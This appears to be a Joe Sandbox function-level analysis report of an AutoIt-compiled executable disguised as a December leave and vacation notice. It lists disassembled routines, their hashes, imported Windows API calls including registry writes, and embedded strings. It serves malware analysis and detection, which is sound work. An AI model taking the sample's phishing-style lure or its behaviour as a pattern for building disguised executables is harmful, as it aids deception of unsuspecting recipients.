                                                      • Opcode ID: 9f4e485330660919055f04f654e52a04bfd94936b287fa385192833e50150dcd
                                                      • Instruction ID: 0382f1160df6dee31f696ef3ffacc5de5fddceeccbdc7f6585f842f9bb6670b1
                                                      • Opcode Fuzzy Hash: 9f4e485330660919055f04f654e52a04bfd94936b287fa385192833e50150dcd
                                                      • Instruction Fuzzy Hash: C6E1C2B1900258ABDF21DFA2CC84EEF7B78FF05724F108166F959AA190D7758A41EF60
                                                      APIs
                                                      • GetCursorPos.USER32(?), ref: 00FE778A
                                                      • GetDesktopWindow.USER32 ref: 00FE779F
                                                      • GetWindowRect.USER32(00000000), ref: 00FE77A6
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00FE7808
                                                      • DestroyWindow.USER32(?), ref: 00FE7834
                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00FE785D
                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00FE787B
                                                      • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00FE78A1
                                                      • SendMessageW.USER32(?,00000421,?,?), ref: 00FE78B6
                                                      • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00FE78C9
                                                      • IsWindowVisible.USER32(?), ref: 00FE78E9
                                                      • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00FE7904
                                                      • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00FE7918
                                                      • GetWindowRect.USER32(?,?), ref: 00FE7930
                                                      • MonitorFromPoint.USER32(?,?,00000002), ref: 00FE7956
                                                      • GetMonitorInfoW.USER32 ref: 00FE7970
                                                      • CopyRect.USER32(?,?), ref: 00FE7987
                                                      • SendMessageW.USER32(?,00000412,00000000), ref: 00FE79F2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                      • String ID: ($0$tooltips_class32
                                                      • API String ID: 698492251-4156429822
                                                      • Opcode ID: 66008ec3fb0efd659153e9778318f2569f4c28909874dc45ae142a4205bb680d
                                                      • Instruction ID: 1aaeb2c61a922d5b394c738fb58666b0fca7988cc3b720e9843d20bb6a3460f7
                                                      • Opcode Fuzzy Hash: 66008ec3fb0efd659153e9778318f2569f4c28909874dc45ae142a4205bb680d
                                                      • Instruction Fuzzy Hash: C5B18E71608340AFD714EFA5C848B6EBBE4FF88310F00891DF5999B291D775E805DBA2
                                                      APIs
                                                      • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00FC6CFB
                                                      • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00FC6D21
                                                      • _wcscpy.LIBCMT ref: 00FC6D4F
                                                      • _wcscmp.LIBCMT ref: 00FC6D5A
                                                      • _wcscat.LIBCMT ref: 00FC6D70
                                                      • _wcsstr.LIBCMT ref: 00FC6D7B
                                                      • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00FC6D97
                                                      • _wcscat.LIBCMT ref: 00FC6DE0
                                                      • _wcscat.LIBCMT ref: 00FC6DE7
                                                      • _wcsncpy.LIBCMT ref: 00FC6E12
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                      • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                      • API String ID: 699586101-1459072770
                                                      • Opcode ID: 945f300ad082a0e7e717b6386deb0a1ca25a03622d8fb87134c29c8df4f9fad5
                                                      • Instruction ID: 5a093332d25b55552163e4506f8682d5e180aef47b85de413b16fdf1e35af6a6
                                                      • Opcode Fuzzy Hash: 945f300ad082a0e7e717b6386deb0a1ca25a03622d8fb87134c29c8df4f9fad5
                                                      • Instruction Fuzzy Hash: 6C411572A042057BEB01AB64DD47FBF776CEF46320F044029F901E6142EF79A901B3A5
                                                      APIs
                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00F9A939
                                                      • GetSystemMetrics.USER32(00000007), ref: 00F9A941
                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00F9A96C
                                                      • GetSystemMetrics.USER32(00000008), ref: 00F9A974
                                                      • GetSystemMetrics.USER32(00000004), ref: 00F9A999
                                                      • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00F9A9B6
                                                      • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 00F9A9C6
                                                      • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00F9A9F9
                                                      • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00F9AA0D
                                                      • GetClientRect.USER32(00000000,000000FF), ref: 00F9AA2B
                                                      • GetStockObject.GDI32(00000011), ref: 00F9AA47
                                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 00F9AA52
                                                        • Part of subcall function 00F9B63C: GetCursorPos.USER32(000000FF), ref: 00F9B64F
                                                        • Part of subcall function 00F9B63C: ScreenToClient.USER32(00000000,000000FF), ref: 00F9B66C
                                                        • Part of subcall function 00F9B63C: GetAsyncKeyState.USER32(00000001), ref: 00F9B691
                                                        • Part of subcall function 00F9B63C: GetAsyncKeyState.USER32(00000002), ref: 00F9B69F
                                                      • SetTimer.USER32(00000000,00000000,00000028,00F9AB87), ref: 00F9AA79
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                      • String ID: AutoIt v3 GUI
                                                      • API String ID: 1458621304-248962490
                                                      • Opcode ID: f48d35e9e9adbe7028a04d127ee07f5e44f4b4437f4ef64904fb758deecfeecb
                                                      • Instruction ID: c607dde590fee1fca19dabfb0a545b91556da250355204482692a22a2bef6d6d
                                                      • Opcode Fuzzy Hash: f48d35e9e9adbe7028a04d127ee07f5e44f4b4437f4ef64904fb758deecfeecb
                                                      • Instruction Fuzzy Hash: C5B1AD71A0020ADFEF24DFA8C985BAD7BB5FB08324F104219FA45A7294DB79E840DB51
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Window$Foreground
                                                      • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                      • API String ID: 62970417-1919597938
                                                      • Opcode ID: d73a6880702333bc9968a3421fb26dd5525daa40bb7da5d41f9b012c20c88192
                                                      • Instruction ID: 55847b62ea1b556da6a4d505e681c93c64c1d313c1429ae052c783b579fec1d4
                                                      • Opcode Fuzzy Hash: d73a6880702333bc9968a3421fb26dd5525daa40bb7da5d41f9b012c20c88192
                                                      • Instruction Fuzzy Hash: EFD1183150464A9BDB44EF60CC81AEABBB4BF54314F004A1DF586932B1DB34F99AFB91
                                                      APIs
                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00FE3735
                                                      • RegCreateKeyExW.ADVAPI32(?,?,00000000,0101DC00,00000000,?,00000000,?,?), ref: 00FE37A3
                                                      • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00FE37EB
                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00FE3874
                                                      • RegCloseKey.ADVAPI32(?), ref: 00FE3B94
                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00FE3BA1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Close$ConnectCreateRegistryValue
                                                      • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                      • API String ID: 536824911-966354055
                                                      • Opcode ID: cbd471c316ce6098e665fc89294b442d96d36cdabbcacf6fd0d49c225dfc24a6
                                                      • Instruction ID: 6c279155f719285bbee96c6eb0b25cdf7bcfd0af9a06a62a8c474116719623c6
                                                      • Opcode Fuzzy Hash: cbd471c316ce6098e665fc89294b442d96d36cdabbcacf6fd0d49c225dfc24a6
                                                      • Instruction Fuzzy Hash: 5F027B756046019FDB15EF15CC49A6AB7E9FF88720F04845CF99A9B3A1CB34ED01EB81
                                                      APIs
                                                      • CharUpperBuffW.USER32(?,?), ref: 00FE6C56
                                                      • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00FE6D16
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: BuffCharMessageSendUpper
                                                      • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                      • API String ID: 3974292440-719923060
                                                      • Opcode ID: b675997c041e0bfac2cb5978cd43533da5671eb628fa54c2db029ea3220632d6
                                                      • Instruction ID: 8e2a56fe55c4f86e88ab9891876b55cc923ad796acb33e275515eb0497dc3bf7
                                                      • Opcode Fuzzy Hash: b675997c041e0bfac2cb5978cd43533da5671eb628fa54c2db029ea3220632d6
                                                      • Instruction Fuzzy Hash: A0A180306043859FCB14EF25CC51AAAB3A5FF94364F14496DB8A69B3D2DB38EC05EB41
                                                      APIs
                                                      • GetClassNameW.USER32(?,?,00000100), ref: 00FBCF91
                                                      • __swprintf.LIBCMT ref: 00FBD032
                                                      • _wcscmp.LIBCMT ref: 00FBD045
                                                      • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00FBD09A
                                                      • _wcscmp.LIBCMT ref: 00FBD0D6
                                                      • GetClassNameW.USER32(?,?,00000400), ref: 00FBD10D
                                                      • GetDlgCtrlID.USER32(?), ref: 00FBD15F
                                                      • GetWindowRect.USER32(?,?), ref: 00FBD195
                                                      • GetParent.USER32(?), ref: 00FBD1B3
                                                      • ScreenToClient.USER32(00000000), ref: 00FBD1BA
                                                      • GetClassNameW.USER32(?,?,00000100), ref: 00FBD234
                                                      • _wcscmp.LIBCMT ref: 00FBD248
                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 00FBD26E
                                                      • _wcscmp.LIBCMT ref: 00FBD282
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
                                                      • String ID: %s%u
                                                      • API String ID: 3119225716-679674701
                                                      • Opcode ID: 66ac2842c6f74934043e7424fb5201de9c9d4a701400f96312605665c0a0ce67
                                                      • Instruction ID: 67daf375a732a118183835c2fc7fa18d5b362707377011a48ca0dcf38f89ab9d
                                                      • Opcode Fuzzy Hash: 66ac2842c6f74934043e7424fb5201de9c9d4a701400f96312605665c0a0ce67
                                                      • Instruction Fuzzy Hash: 1AA10071A04742AFD715DF65C884FEAB7A8FF44364F008529F999D2180EB34EA05DFA2
                                                      APIs
                                                      • GetClassNameW.USER32(00000008,?,00000400), ref: 00FBD8EB
                                                      • _wcscmp.LIBCMT ref: 00FBD8FC
                                                      • GetWindowTextW.USER32(00000001,?,00000400), ref: 00FBD924
                                                      • CharUpperBuffW.USER32(?,00000000), ref: 00FBD941
                                                      • _wcscmp.LIBCMT ref: 00FBD95F
                                                      • _wcsstr.LIBCMT ref: 00FBD970
                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 00FBD9A8
                                                      • _wcscmp.LIBCMT ref: 00FBD9B8
                                                      • GetWindowTextW.USER32(00000002,?,00000400), ref: 00FBD9DF
                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 00FBDA28
                                                      • _wcscmp.LIBCMT ref: 00FBDA38
                                                      • GetClassNameW.USER32(00000010,?,00000400), ref: 00FBDA60
                                                      • GetWindowRect.USER32(00000004,?), ref: 00FBDAC9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                      • String ID: @$ThumbnailClass
                                                      • API String ID: 1788623398-1539354611
                                                      • Opcode ID: 9416eda9b858d7306c3fbeceee05cfa86021a7ca64710f6687b4bd606a2bca21
                                                      • Instruction ID: 52b7570b98c57dcf0fc2ad9fc09f732f16d9207b648e5bce8e0dc841da7bfa90
                                                      • Opcode Fuzzy Hash: 9416eda9b858d7306c3fbeceee05cfa86021a7ca64710f6687b4bd606a2bca21
                                                      • Instruction Fuzzy Hash: E281B1314083059BDB15DF51C885BEA7BE8FF84724F04846AFD899A086EB38DD45DFA2
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: __wcsnicmp
                                                      • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                      • API String ID: 1038674560-1810252412
                                                      • Opcode ID: 5d7aef30c0fdba7645e5b2959bf2ff02677ec9e6412074e506430798dc468b45
                                                      • Instruction ID: cc1b186fc5de63e7dccf6e68ec242a0f2a2ff1b968a5867138cb6c4dafbc00b0
                                                      • Opcode Fuzzy Hash: 5d7aef30c0fdba7645e5b2959bf2ff02677ec9e6412074e506430798dc468b45
                                                      • Instruction Fuzzy Hash: 71318131A44209AADB18FA62DE53FED73B89F61711F300129F481B50D1FF69AE04EB56
                                                      APIs
                                                      • LoadIconW.USER32(00000063), ref: 00FBEAB0
                                                      • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00FBEAC2
                                                      • SetWindowTextW.USER32(?,?), ref: 00FBEAD9
                                                      • GetDlgItem.USER32(?,000003EA), ref: 00FBEAEE
                                                      • SetWindowTextW.USER32(00000000,?), ref: 00FBEAF4
                                                      • GetDlgItem.USER32(?,000003E9), ref: 00FBEB04
                                                      • SetWindowTextW.USER32(00000000,?), ref: 00FBEB0A
                                                      • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00FBEB2B
                                                      • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00FBEB45
                                                      • GetWindowRect.USER32(?,?), ref: 00FBEB4E
                                                      • SetWindowTextW.USER32(?,?), ref: 00FBEBB9
                                                      • GetDesktopWindow.USER32 ref: 00FBEBBF
                                                      • GetWindowRect.USER32(00000000), ref: 00FBEBC6
                                                      • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00FBEC12
                                                      • GetClientRect.USER32(?,?), ref: 00FBEC1F
                                                      • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00FBEC44
                                                      • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00FBEC6F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                      • String ID:
                                                      • API String ID: 3869813825-0
                                                      • Opcode ID: 0b981dd5e63f9c919d4aa480d28bd7998b4dfed1730442d47eaf6d9f57e77e3c
                                                      • Instruction ID: 9c24291799d32c3630f9b45b3eb543bdac11ca8c6ff434117d6eac322a60633b
                                                      • Opcode Fuzzy Hash: 0b981dd5e63f9c919d4aa480d28bd7998b4dfed1730442d47eaf6d9f57e77e3c
                                                      • Instruction Fuzzy Hash: D3515E71900709EFDB219FA9CD89BAEBBF9FF48704F004918E586A2590C779A944DF10
                                                      APIs
                                                      • LoadCursorW.USER32(00000000,00007F8A), ref: 00FD79C6
                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00FD79D1
                                                      • LoadCursorW.USER32(00000000,00007F03), ref: 00FD79DC
                                                      • LoadCursorW.USER32(00000000,00007F8B), ref: 00FD79E7
                                                      • LoadCursorW.USER32(00000000,00007F01), ref: 00FD79F2
                                                      • LoadCursorW.USER32(00000000,00007F81), ref: 00FD79FD
                                                      • LoadCursorW.USER32(00000000,00007F88), ref: 00FD7A08
                                                      • LoadCursorW.USER32(00000000,00007F80), ref: 00FD7A13
                                                      • LoadCursorW.USER32(00000000,00007F86), ref: 00FD7A1E
                                                      • LoadCursorW.USER32(00000000,00007F83), ref: 00FD7A29
                                                      • LoadCursorW.USER32(00000000,00007F85), ref: 00FD7A34
                                                      • LoadCursorW.USER32(00000000,00007F82), ref: 00FD7A3F
                                                      • LoadCursorW.USER32(00000000,00007F84), ref: 00FD7A4A
                                                      • LoadCursorW.USER32(00000000,00007F04), ref: 00FD7A55
                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 00FD7A60
                                                      • LoadCursorW.USER32(00000000,00007F89), ref: 00FD7A6B
                                                      • GetCursorInfo.USER32(?), ref: 00FD7A7B
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Cursor$Load$Info
                                                      • String ID:
                                                      • API String ID: 2577412497-0
                                                      • Opcode ID: cf0aa9ed8cd6ac4c7915176bf6d8e00727d419dcb294de048d7fdc5b801cdfec
                                                      • Instruction ID: 28846237dc4f1e6dc8bda7ee43c52f628d41d20283c4439ff0e4a8419cd2260f
                                                      • Opcode Fuzzy Hash: cf0aa9ed8cd6ac4c7915176bf6d8e00727d419dcb294de048d7fdc5b801cdfec
                                                      • Instruction Fuzzy Hash: 5E3117B1D083196ADB509FB68C8995FBFE9FF04750F544527A50DE7280EB7CA5008FA1
                                                      APIs
                                                        • Part of subcall function 00F9E968: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00F8C8B7,?,00002000,?,?,00000000,?,00F8419E,?,?,?,0101DC00), ref: 00F9E984
                                                        • Part of subcall function 00F8660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F853B1,?,?,00F861FF,?,00000000,00000001,00000000), ref: 00F8662F
                                                      • __wsplitpath.LIBCMT ref: 00F8C93E
                                                        • Part of subcall function 00FA1DFC: __wsplitpath_helper.LIBCMT ref: 00FA1E3C
                                                      • _wcscpy.LIBCMT ref: 00F8C953
                                                      • _wcscat.LIBCMT ref: 00F8C968
                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 00F8C978
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00F8CABE
                                                        • Part of subcall function 00F8B337: _wcscpy.LIBCMT ref: 00F8B36F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: CurrentDirectory$_wcscpy$FullNamePath__wsplitpath__wsplitpath_helper_wcscat
                                                      • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                      • API String ID: 2258743419-1018226102
                                                      • Opcode ID: b606c7cf6b40c5a412b77225838aa47156e3d2ac503f4283e3e936b93989ed2e
                                                      • Instruction ID: 99ae168355a5ce2d2385feadde0ab91a6a87ed99be37462837dccee20eb8ad5b
                                                      • Opcode Fuzzy Hash: b606c7cf6b40c5a412b77225838aa47156e3d2ac503f4283e3e936b93989ed2e
                                                      • Instruction Fuzzy Hash: 2B12A0715083459FC724EF24C881AAFBBE4BFD9314F00491EF58993261DB38D949EBA2
                                                      APIs
                                                      • _memset.LIBCMT ref: 00FECEFB
                                                      • DestroyWindow.USER32(?,?), ref: 00FECF73
                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00FECFF4
                                                      • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00FED016
                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00FED025
                                                      • DestroyWindow.USER32(?), ref: 00FED042
                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00F80000,00000000), ref: 00FED075
                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00FED094
                                                      • GetDesktopWindow.USER32 ref: 00FED0A9
                                                      • GetWindowRect.USER32(00000000), ref: 00FED0B0
                                                      • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00FED0C2
                                                      • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00FED0DA
                                                        • Part of subcall function 00F9B526: GetWindowLongW.USER32(?,000000EB), ref: 00F9B537
